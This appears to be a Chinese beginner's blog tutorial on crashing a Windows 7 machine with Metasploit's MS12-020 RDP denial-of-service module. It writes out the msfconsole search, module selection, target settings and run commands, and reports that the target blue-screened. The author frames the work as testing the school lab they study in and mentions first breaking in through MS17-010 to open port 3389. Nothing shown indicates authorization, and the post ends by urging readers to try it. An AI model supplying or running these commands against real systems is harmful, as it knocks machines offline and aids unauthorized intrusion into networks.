初学kali之msfconsole攻击框架初识

前言

这次了解到我们学习的机房可能存在ms12-020漏洞，全称：Microsoft windows远程桌面协议RDP远程代码执行漏洞），所以打算测试测试。

工具：kali系统

注意：目标机与本机得互通才行，该漏洞支持win7和win2008,不支持win10，不过大部分机房估计都可以使用，需开启3389端口，我这里是先进行了ms17-010漏洞获取了shell，开启了3389端口，才可以执行的

攻击机kali：192.168.8.39

目标靶机win7:192.168.8.238

这里还存在ms17-010（永恒之蓝）漏洞，利用445端口入侵，获取shell进行提权。这里我就不演示了，相关的可以去百度。

开始攻击

一、首先我们先ping一下目标靶机

初学kali之msfconsole攻击框架初识

二、进入kali系统的msfconsole攻击框架，使用漏洞

初学kali之msfconsole攻击框架初识

代码：

1.msfconsole                  #进入msfconsole 框架
2.search ms12-020        #搜索ms12-020漏洞
3.use auxiliary/dos/windows/rdp/ms12_020_maxchannelids           #使用这个漏洞，第二个是检查这个目标是否存在漏洞，我这里就不检查了

三、配置相关目标信息

初学kali之msfconsole攻击框架初识

初学kali之msfconsole攻击框架初识

命令介绍：

1.show options          #查看相关参数设置
2.set RHOSTS 192.168.8.238        #设置目标靶机的ip地址
3.set RPORT 3389         #设置目标靶机的ip地址，默认3389

四、执行攻击，查看效果

初学kali之msfconsole攻击框架初识

命令：

run          #开始攻击

上图已经是攻击成功了，接下来我们查看效果。

初学kali之msfconsole攻击框架初识

这样就已经成功了，目标靶机应该已经蓝屏死机了，这里已经ping不到了。大家有机会的话可以去试试。

想要了解更多的朋友可以去百度哦~